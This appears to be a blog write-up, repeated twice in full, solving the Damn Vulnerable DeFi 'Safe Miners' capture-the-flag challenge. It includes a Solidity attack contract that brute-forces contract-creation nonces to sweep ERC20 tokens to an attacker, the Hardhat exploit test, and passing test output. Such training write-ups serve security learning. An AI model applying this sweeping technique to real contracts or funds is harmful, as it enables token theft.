web3maxi
web3maxi
Subscribe to Runstar
Subscribe to Runstar
Share Dialog
Share Dialog
<100 subscribers
<100 subscribers
Somebody has sent +2 million DVT tokens to 0x79658d35aB5c38B6b988C23D02e0410A380B8D5c. But the address is empty, isn't it?
To pass this challenge, you have to take all tokens out.
You may need to use prior knowledge, safely.
目标: 偷走所有DVT token
after(async function () {
/** SUCCESS CONDITIONS */
// The attacker took all tokens available in the deposit address
expect(await this.token.balanceOf(DEPOSIT_ADDRESS)).to.eq("0");
expect(await this.token.balanceOf(attacker.address)).to.eq(DEPOSIT_TOKEN_AMOUNT);
});
循环暴力破解找到正确的nonce
// SPDX-License-Identifier: MIT
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
pragma solidity ^0.8.0;
contract SafeMinersAttack {
constructor(
address attacker,
IERC20 token,
uint256 nonces
) {
for (uint256 idx; idx < nonces; idx++) {
new TokenSweeper(attacker, token);
}
}
}
contract TokenSweeper {
constructor(address attacker, IERC20 token) {
uint256 balance = token.balanceOf(address(this));
if (balance > 0) {
token.transfer(attacker, balance);
}
}
}
it("Exploit", async function () {
/** CODE YOUR EXPLOIT HERE */
this.timeout(0);
for (let nonce = 0; nonce < 80; nonce++) {
await (
await ethers.getContractFactory("SafeMinersAttack", deployer)
).deploy(attacker.address, this.token.address, 80);
await (
await ethers.getContractFactory("SafeMinersAttack", attacker)
).deploy(attacker.address, this.token.address, 80);
}
});
运行通过
yarn run safe-miners
yarn run v1.22.19
warning ../../package.json: No license field
$ yarn hardhat test test/safe-miners/safe-miners.challenge.js
warning ../../package.json: No license field
$ /home/runstar/solidityLearn/damn-vulnerable-defi/node_modules/.bin/hardhat test test/safe-miners/safe-miners.challenge.js
[Challenge] Safe Miners
✓ Exploit (140271ms)
1 passing (2m)
Done in 143.80s.
Somebody has sent +2 million DVT tokens to 0x79658d35aB5c38B6b988C23D02e0410A380B8D5c. But the address is empty, isn't it?
To pass this challenge, you have to take all tokens out.
You may need to use prior knowledge, safely.
目标: 偷走所有DVT token
after(async function () {
/** SUCCESS CONDITIONS */
// The attacker took all tokens available in the deposit address
expect(await this.token.balanceOf(DEPOSIT_ADDRESS)).to.eq("0");
expect(await this.token.balanceOf(attacker.address)).to.eq(DEPOSIT_TOKEN_AMOUNT);
});
循环暴力破解找到正确的nonce
// SPDX-License-Identifier: MIT
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
pragma solidity ^0.8.0;
contract SafeMinersAttack {
constructor(
address attacker,
IERC20 token,
uint256 nonces
) {
for (uint256 idx; idx < nonces; idx++) {
new TokenSweeper(attacker, token);
}
}
}
contract TokenSweeper {
constructor(address attacker, IERC20 token) {
uint256 balance = token.balanceOf(address(this));
if (balance > 0) {
token.transfer(attacker, balance);
}
}
}
it("Exploit", async function () {
/** CODE YOUR EXPLOIT HERE */
this.timeout(0);
for (let nonce = 0; nonce < 80; nonce++) {
await (
await ethers.getContractFactory("SafeMinersAttack", deployer)
).deploy(attacker.address, this.token.address, 80);
await (
await ethers.getContractFactory("SafeMinersAttack", attacker)
).deploy(attacker.address, this.token.address, 80);
}
});
运行通过
yarn run safe-miners
yarn run v1.22.19
warning ../../package.json: No license field
$ yarn hardhat test test/safe-miners/safe-miners.challenge.js
warning ../../package.json: No license field
$ /home/runstar/solidityLearn/damn-vulnerable-defi/node_modules/.bin/hardhat test test/safe-miners/safe-miners.challenge.js
[Challenge] Safe Miners
✓ Exploit (140271ms)
1 passing (2m)
Done in 143.80s.
No activity yet